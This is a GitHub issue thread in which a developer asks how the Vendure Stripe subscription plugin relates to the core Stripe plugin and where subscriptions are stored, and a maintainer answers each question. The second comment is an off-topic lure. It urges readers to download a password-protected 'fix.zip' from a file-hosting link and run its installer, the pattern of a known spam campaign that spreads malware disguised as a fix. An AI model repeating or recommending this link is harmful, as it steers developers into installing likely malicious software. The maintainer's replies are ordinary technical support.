### ISSUE TITLE
Assistance needed with the Stripe Subscription Plugin

### ISSUE THREAD

**Issue by aamirlegacy** [Pinelab-studio/pinelab-vendure-plugins#499]
**Which plugin/repository is the issue about?**
[vendure-plugin-stripe-subscription]

Hi our team is looking to implement the stripe subscription plugin on our store front, however we had some questions we were hoping your team can assist with. 

1. Is this plugin supposed to be used in conjunction with the Stripe Plugin in Vendure or is this a replacement for that plugin
2. We are unable to see the subscription schedules in the Admin UI. Is there a special process to be able to show them in the Admin UI?
3. Are the subscriptions stored in the database or are they created as Stripe Subscriptions in Stripe Admin Panel ?
4. If the subscriptions are stored in the database, which tables store that data?

Thank you so much for your assistance!

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by martijnvdbrug** [comment]
Hi!

> Is this plugin supposed to be used in conjunction with the Stripe Plugin in Vendure or is this a replacement for that plugin
This is a replacement for the core Stripe Plugin. The subscription plugin supports everything from the core Stripe plugin + subscriptions.

> We are unable to see the subscription schedules in the Admin UI. Is there a special process to be able to show them in the Admin UI?
Currently the plugin doesn't show created schedules in the admin ui. The idea is that Stripe is the source of truth of schedules, because they can also be edited/deleted outside of Vendure. A nice feature would be to maybe fetch created subscriptions directly from Stripe and display them in Vendure. There are quite a few caveats to implement this, but PR's are always welcome. Let me know if you need any help getting started.

> Are the subscriptions stored in the database or are they created as Stripe Subscriptions in Stripe Admin Panel ?
Created as Stripe Subscriptions in Stripe

> If the subscriptions are stored in the database, which tables store that data?
Not in DB, to prevent having to keep data in Vendure in sync with the data in Stripe
